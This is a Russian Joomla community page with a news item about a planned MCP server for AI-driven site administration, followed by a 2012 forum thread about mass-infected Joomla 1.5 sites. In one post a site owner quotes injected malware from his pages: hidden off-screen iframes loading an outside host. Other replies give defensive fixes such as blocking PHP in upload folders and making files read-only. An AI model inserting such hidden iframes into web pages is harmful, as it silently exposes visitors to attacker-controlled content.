Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2895 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
У меня на аккаунтах Timeweb находятся более 100 сайтов.
С 19 числа более 20 сайтов были заражены. В папку images/stories были внедрены какие то php файлы и картинки и с сайтов рассылался спам.
Браузеры на сайты ставят заглушку с предупреждением.
Служба поддержки просто бросает трубку даже не вникнув в суть вопроса.
Вопрос к тем кто в курсе. Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.
Как их автоматически удалять с сайтов - не на всех сайтах был бекап.
« Последнее редактирование: 21.12.2012, 18:00:48 от _ib_ »
*

SmiP

  • Захожу иногда
  • 265
  • 35 / 0
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.


а может всетаки через компоненты ломают  ?   ;)


зы:  название темы уж больно страшное
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
в папке images/stories/ , да и влюбой другой папке, откуда не должны запускаться PHP, создать .htaccess с содержанием:

<Files ~"\.php$">
Order allow,deny
Deny from all
Satisfy all
</Files>


Это не есть решение проблемы, это как профилактика от ботов, если есть дырочки. Но а так обновляйте Ваши расширения вовремя.
« Последнее редактирование: 21.12.2012, 18:00:21 от _ib_ »
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #4 : 21.12.2012, 18:10:12 »
А как можно запретить модификацию вирусами скриптов?
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
Re: Инфицирование сайтов на Joomla
« Ответ #5 : 21.12.2012, 18:25:20 »
в правах на файлы запретить всем запись, но тогда вы и не сможете обновляться. Перед обновлением можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
« Последнее редактирование: 21.12.2012, 18:37:26 от _ib_ »
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #6 : 21.12.2012, 18:31:44 »
Массовую смену прав может Admin Tools
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #7 : 21.12.2012, 21:25:47 »
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза, компоненты и модули поудалял, шаблон переустановил, картинки вычистил.
Все равно вирус лезет((( Заражает все мгновенно. Как его вычислить? Вот такое безобразие вставляет:

Код
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript" src="/media/system/js/caption.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css"/>
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css"/>
<link rel="stylesheet" type="text/css" href="/templates/volvo7/css/template.css" media="screen"/>
<!--[if IE 6]><link rel="stylesheet" href="/templates/volvo7/css/template.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="/templates/volvo7/css/template.ie7.css" type="text/css" media="screen" /><![endif]-->
<script type="text/javascript" src="/templates/volvo7/jquery.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript">jQuery.noConflict();</script>
<script type="text/javascript" src="/templates/volvo7/script.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>

*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #8 : 22.12.2012, 05:21:15 »
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза
Просто заливать "поверх" бессмысленно, т.к. шеллы, как правило, отдельные файлы, не входящие "в комплект" Joomla, и они остались на своём месте. Чтобы найти причину - читайте логи доступа.

можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
Если есть SSH, всё это решается быстро и просто. В примере рекурсивный обход директории /public_html с установкой прав "только чтение" для всех файлов php (синтаксис для BSD)
Код
find /home/xxx/public_html/ -type f -name "*.php" -exec chmod 444 {} 
Другой вопрос, что и "защита" это - так себе. Скорее временная затычка на время устранения проблемы. Т.к. если злоумышленник получает права писать в директории, с большой вероятностью он сможет также легко поменять права.
« Последнее редактирование: 22.12.2012, 05:29:35 от WebDisaster »
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #9 : 22.12.2012, 11:25:09 »
ага... именно так. Я могу к примеру менять права
*

zikkuratvk

  • Глобальный модератор
  • 4824
  • 346 / 2
  • Обслуживаем проекты - дорого.
Re: Инфицирование сайтов на Joomla
« Ответ #10 : 22.12.2012, 11:58:28 »
Если я правильно понял, то проблема скорей всего в JCE старом там есть дыра через нее льют шелы. Если у вас есть шел на хосте, то изменение прав вам врядли поможет, он так же от имени PHP сменит права на папки скорей всего. Есть отличные утилиты, которые ищут залитые шелы... используйте их. Перед началом лечения, смени ftp разнесите сайты на разные аккаунты.
Хочется уникальное расширение? ===>>>> JoomLine - Разрабатываем расширения под заказ.
Использую хостинг TimeWeb и Reg
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 3822
Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 4886
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 4675
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Изолирование папок сайтов на OpenServer

Автор Lemady

Ответов: 41
Просмотров: 9098
Последний ответ 29.11.2021, 15:47:31
от KoreshS
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 3295
Последний ответ 13.09.2021, 09:23:28
от Oleg+